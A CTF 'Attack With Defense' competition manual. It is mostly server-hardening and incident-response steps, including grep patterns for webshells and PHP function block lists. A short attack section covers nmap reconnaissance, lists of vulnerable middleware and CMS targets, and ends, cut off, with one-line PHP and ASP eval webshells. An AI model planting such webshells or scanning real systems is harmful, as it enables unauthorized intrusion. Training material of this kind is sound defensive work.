Title: AWD offensive and defense competition instruction manual

0# What is AWD

0.1# Introduction to AWD Competition System

"Occasional and Defensive Mode | AWD (Attack With Defense)" is one of the several main game modes in the CTF competition "CTF Capture The Flag", which is commonly found in offline games.

In this mode, each team has the same initial environment (we call it GameBox ) that usually runs certain services or applications that often contain some security vulnerabilities. The participating teams need to exploit security vulnerabilities in the services of the opponent's team to obtain flags to obtain points; at the same time, the participating teams also need to patch their own service vulnerabilities to defend against them in order to prevent them from being attacked and obtained by other teams.

The main characteristics are: emphasizing practicality, real-timeness, and confrontation, and comprehensively considering the penetration and protection capabilities of the competition team.

0.2# Overall process of the competition

Pre-match preparation session: We will allocate multiple target servers, usually assigned to us SSH or VNC usernames and passwords, as well as related IP and other information

Security reinforcement link: We need to log in to the target machine server by ourselves and perform 30 minutes of security reinforcement (source code backup/weak password modification/code auditing and repair/vulnerability repair, etc.)

Free attack link: After the security reinforcement time has passed, the free attack link will be started. By attacking target servers of other teams (weak passwords/Web vulnerabilities/system vulnerabilities, etc.) to get extra points, and the corresponding team loses points.

1# Competition environment

Usually there are three situations in the competition environment:

Hybrid target machine situation: Operation and maintenance machine Windows 10+ attack machine Kali Linux+ Win target machine Windows Server 2003/2008/2012 or Windows 7+ Linux target machine Centos7.x or Ubuntu 16.04/17.01/20.04

Pure Linux target machine situation: Operation and maintenance machine Windows 10+ attack machine Kali Linux+ Linux target machine Centos7.x or Ubuntu 16.04/17.01/20.04

Pure Windows target machine situation: Operation and maintenance machine Windows 10+ attack machine Kali Linux+ Win target machine Windows Server 2003/2008/2012 or Windows 7

2# Security Reinforcement Process (Defense)

2.0# Basic reinforcement process

2.0.1 Windows Reinforcement Process

Backup first: Web source code, database

445 reinforcement, enable firewall or IP advanced security policies

Turn on the system log audit function

Disable guest account and close file sharing

Make sure the content of the startup item is controllable

Limit the number of connections to remote access control: In the local Group Policy Editor, expand Computer Configuration-Administrative Templates-Windows Components-Remote Desktop Service-Remote Desktop Session Host-Connection-Limit the number of connections

Use tools to monitor key directory files : file operation monitoring.exe, Yujian file monitoring.exe.

Malicious code files, searched through PCHunter and Monitor

Search for related suspicious files in the web directory environment: jpg/png/rar, view attributes, decompress and view file contents

NTFS scans disk to find hidden exchange flow data

Find all account information in the system and prohibit non-Administrator accounts.

Modify the access path, default password, and database password of the Web site administrator

Install WAF scripts to protect the Web site and prohibit other vulnerabilities

2.0.2 Linux reinforcement process

Backup first: Web source code, database

Modify the system password, unified team password

Search for historical commands through .bash_history and find traces

View scheduled tasks: crontab -l; edit scheduled tasks: crontab -e

Check whether there are any exceptions in startup service in /etc/init.d/rc.local

Use scripts to enable process monitoring, directory monitoring, and traffic monitoring

Web site password, site administrator path modification

System Reinforcement: iptable

2.1# Basic information collection

When defending, information collection is also very important. As the saying goes, "Know yourself and your enemy, you will never be defeated in a hundred battles."

2.1.1 Clarify Linux machine information

uname -a //System information

ps -aux //Query process information

ps -ef | grep process name //Filter the specified process

id //Used to display the user ID and the group ID

cat /etc/passwd //View user situation

ls /home///Check user situation

find/-type d -perm -002 //Writeable directory check

ifconfig //View network card information on Linux

2.1.2 Clarify Windows machine information

whoami /all //View user details on Windows

ipconfig /all //View network card information on Windows

2.1.3 View Open Port

netstat //View active connection

netstat -ano/-a //Check port status

netstat -anp //View port

firewall-cmd --zone=public --remove-port=80/tcp –permanent //Close the port

firewall-cmd –reload //Restart the firewall

2.1.4 Default password (weak password) change

In order to prevent weak password attacks, Mysql password is root by default, phpstudy default password 123456

There are other default passwords admin, top100, top1000, etc.

Especially the background password modification of WEB application passwd username //ssh password modification

set password for mycms@localhost=password('18ciweufhi28746'); //MySQL password modification

find /var/www/html -path '*config*' //Find password credentials in the configuration file

2.1.5 Find local flag

grep -r 'flag' /var/www/html///Linux: Find flags in the web directory

findstr /s /i 'flag' *.* //Windows: Find the string 'flag' in the current directory and all files in all subdirectories

2.1.6 Setting ping disabled

echo '1' /proc/sys/net/ipv4/icmp_echo_ignore_all //Temporarily enable ping ban

echo '0' /proc/sys/net/ipv4/icmp_echo_ignore_all //Close ping ban

2.2# Web Security Reinforcement

2.2.1 Backup source code

Prevent problems when modifying the source code, or the attacked party deletes the source code and prepares

Compressed source code:

tar -cvf web.tar /var/www/html

zip -q -r web.zip /var/www/html

Decompress the source code:

tar -xvf web.tar -c /var/www/html

unzip web.zip -d /var/www/html

Backup source code:

mv web.tar /tmp

mv web.zip /home/xxx

Upload and download source code:

scp username@servername:/path/filename /tmp/local_destination //Download a single file from the server to the local

scp /path/local_filename username@servername:/path //From a single file from local to the server

scp -r username@servername:remote_dir//tmp/local_dir //Download the entire directory from the server to the local

scp -r /tmp/local_dir username@servername:remote_dir //Upload the entire directory from local to the server

2.2.2 Set read-only permissions

Set read-only and execution permissions for web files (execution permissions are required for dynamic languages such as PHP)

chmod 0555 /var/www/html/*

chmod 0555 /var/www/html/*.php

Set read-only and execution permissions in the web root directory

chmod 0555 /var/www/html

Change the file's owner and group to set strict permissions

chown -R root:root /var/www/html///Set the owner as root:root or httpd:httpd (recommended)

chown -R apache:apache /var/www/html///Make sure apache has /var/www/html/

2.2.3 Configuration .htaccess

Use .htaccess configuration file to prohibit the execution of php file

Directory '/var/www/html/upload' //The subsequent instructions for the specified directory will be applied to the directory

Options -ExecCGI -Indexes //CGI execution and directory indexing (display directory content list) functions in directories are disabled.

AllowOverride None //Unable to overwrite the server's configuration in this directory using the .htaccess file.

RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml

RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml

//These two instructions remove the processor and type of the specified file extension.

//In this case, these directives remove PHP-related extensions and server-side inclusion (SSI) file types from Apache's processing list.

php_flag engine off //This directive sets the PHP engine flag (engine) to off, thus disabling the ability to execute PHP scripts in this directory.

FilesMatch '.+\.ph(p[3457]?|t|tml)$'

deny from all

/FilesMatch //These three-line commands use regular expressions to match files ending with .php,phtml,php3,pht,php4,php5,php7,shtml, and set their access permissions to deny all

/Directory

2.2.4 PHP parameter security configuration

First find the PHP configuration file

/etc/php/{version}/php.ini

Disable high-risk functions

disable_functions=dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link

Configure open_basedir (limits the activity range of user access files to specified areas)

open_basedir=/var/www/html

Disable magic quotes (automatically escape external source data to prevent SQL injection)

magic_quotes_gpc=Off

Close PHP pseudo-protocol

allow_url_fopen=Off

allow_url_include=Off

Restart PHP

sudo service php7.0-fpm restart

sudo systemctl restart php7.0-fpm.service

2.3# Database security reinforcement

2.3.1 Mysql reinforcement

In order to prevent weak password attacks, Mysql password is root by default, phpstudy default password 123456

Don't use the default password, modify it to be complex, and ensure connection with the web environment

Set only allow local 127.0.0.1 account login: modify bind-address=127.0.0.1; add secure_file_priv=NULL to the configuration file

Turn on the log audit function: general_log_file=path

Because the Mysql database is the most commonly used, most of the basic attack and defense are used to use the MySql database commands

Backup the specified database:

mysqldump –u username –p password databasename target.sql

Backup all databases:

mysqldump –all -databases all.sql

Import the database:

mysql –u username –p password database from.sql

For MySQL's offense and defense, you can read this article: https://blog.zgsec.cn/archives/26.html

MySQL default configuration file path:

C:\\Program Files\MySQL\MySQLServer 5.1\my.ini //Windows

/etc/my.cnf //Linux

/etc/mysql/my.cnf //Linux

Modify the secure_file_priv parameter (the corresponding directory of the log function)

secure_file_priv=''

Overload MySQL configuration

FLUSH PRIVILEGES

Restart MySQL service

sudo service mysql restart

sudo systemctl restart mysql

2.3.2 Mssql reinforcement

Delete unnecessary accounts

SQLServer user password security

Avoid account sharing according to users

Assign the minimum permissions required for database users

Network access restrictions

SQLServer login audit

SQLServer security incident audit

Configure logging function

2.4# Remote control reinforcement

2.4.1 SSH safety reinforcement

How to restrict IP login

sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions

AllowUsers [email protected] //Find and edit the following line to make sure it is uncommented and set to the desired IP address

Disable root remote login

sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions

PermitRootLogin no //Set PermitRootLogi to "no"

Restrict SSH login by user and group

sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions

AllowUsers testuser //Set only allows testuser to log in to SSH

AllowUsers [email protected] //Set only allows 192.168.1.100 machines to log in to SSH with the testuser account

AllowGroups test //Set user group whitelist

//It should be noted that if AllowUsers and AllowGroups are specified at the same time, then users that match both options must be SSH login

Restart SSH service

sudo service sshd restart

sudo systemctl restart sshd.service

2.4.2 RDP remote login security reinforcement

Delete the default account and add new users manually:

Step 1: Press Win + R to open the Run dialog box, enter secpol.msc and click OK

Step 2: Navigate to this: Local Policy-User Permissions Allocation, and then double-click to open "Allow login through Remote Desktop Service"

Step 3: Delete the administrator and remote desktop users (or any other user or group on the computer) listed in this window

Step 4: After that click "Add User or Group" and manually add the user you want to grant remote desktop access.

Change the default RDP port number:

Step 1: Open the Run dialog box, enter regedit and click OK

Step 2: Open HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, scroll down and find PortNumber and double-click it

Step 3: Select "Decimal", modify the port number you want to set, and then click "OK"

2.5# Emergency Response

2.5.1 Query process thread

netstat

ps -aux

netstat -apt

2.5.2 Kill the process

kill -9 pid //on Linux

taskkill /f /pid pid //on Windows

2.5.3 Search WebShell Files

find /var/www/html -name *.php -mmin -5 //View the file modified in the last 5 minutes

find ./-name '*.php' | xargs wc -l | sort -u //Find the file with the shortest number of lines, which is generally a Trojan

grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html //Check the php file containing keywords

find /var/www/html -type f -name '*.php' | xargs grep 'eval(' |more //In Linux system, use a combination of find, grep and xargs commands to find all files with .php extension in a specified directory (/var/www/html), and search for lines containing the string 'eval(' in these files, and use the more command to paginate the results so that page-by-page viewing is performed when the output is longer

2.5.4 Check to kill horses

You can also use commands to automatically search and delete

ps -aux | grep www-data | grep -v grep | awk '{print $2}' | xargs kill -9

Then restart the service

service php-fpm restart

2.5.5 Kill rebound shell

The old rules to view the process

ps -ef

px -aux

ps -aux | grep www-data

Note that www-data permissions /bin/sh is likely to be nc

Then there is an old order

kill ps -aux | grep www-data | grep apache2 | awk '{print $2}'

3# Free Attack (Attack)

3.0# Main content

The latest version of various CMS software packages are prepared

Scanning tools: Nmap, Nessus, Metasploit updates

Exploit Scripts Poc, Exp

3.1# Basic information collection

3.1.1 Host information collection

Nmap

namp -sn 192.168.0.0/24 //Segment C survival scan

httpscan

httpscan.py 192.168.0.0/24 –t 10 //C segment survival scan

3.1.2 Port Scan

nmap -sV 192.168.0.2 //Scan the host system version

nmap -sS 192.168.0.2 //Scan the commonly used ports of the host

nmap -sS -p 80,445 192.168.0.2 //Scan the host part of the port

nmap -sS -p- 192.168.0.2 //Scan all ports of the host

Python scripts

import requests

for x in range(2,255):

url='http://192.168.1.{}'.format(x)

try:

r=requests.post(url)

print(url)

except:

pass

3.2# External management

3.2.0 Common system vulnerabilities

MS17-010 (Eternal Blue, please see https://blog.zgsec.cn/archives/172.html)

MySQL performs UDF escalation (SQL injection or MySQL weak password)

MsSQL performs system command execution (SQL injection or MsSQL weak password)

SSH weak password or default password

PWN (This depends on the specific content provided by the AWD competition)

3.2.1 Middleware vulnerability

IIS (resolving vulnerabilities, remote code execution)

Apache (Parse vulnerability)

Nginx (parsing vulnerability)

Jboss (CVE-2017-7504/CVE-2017-12149/CVE-2015-7501)

Mysql (weak password)

Tomcat (weak password Getshell)

Weblogic (CVE-2020-2551/CVE-2020-2555/CVE-2020-2883)

SpringBoot (Unauthorized access vulnerability and RCE vulnerability, please refer to https://blog.zgsec.cn/archives/129.html)

3.2.2 Vulnerability in integrated service environment

wampserver

xampserver

3.2.3 CMS Vulnerability Exploit

Collect the latest version of CMS, as well as the corresponding vulnerabilities Poc and Exp, here only some of the CMS are listed:

Aspcms

Dedecms

Dicuz

Drupal

Empirecms

Eshop

Finecms

Joomla

Lamp

Metainfo

Phpcms

Phpwind

Qibocms

Seacms

Semcms

ThinkPHP

Wolfcms

Wordpress

Zabbix

Backup file blasting: Use directory scanning tools such as 7kbScan to blast the web system

3.2.4 Upload WebShell

A common saying about Trojan

PHP:php @eval($_POST['pass']);php eval($_GET['pass']);

Asp: %eval request ('pass')%

Aspx: %@ Page Language='Jscript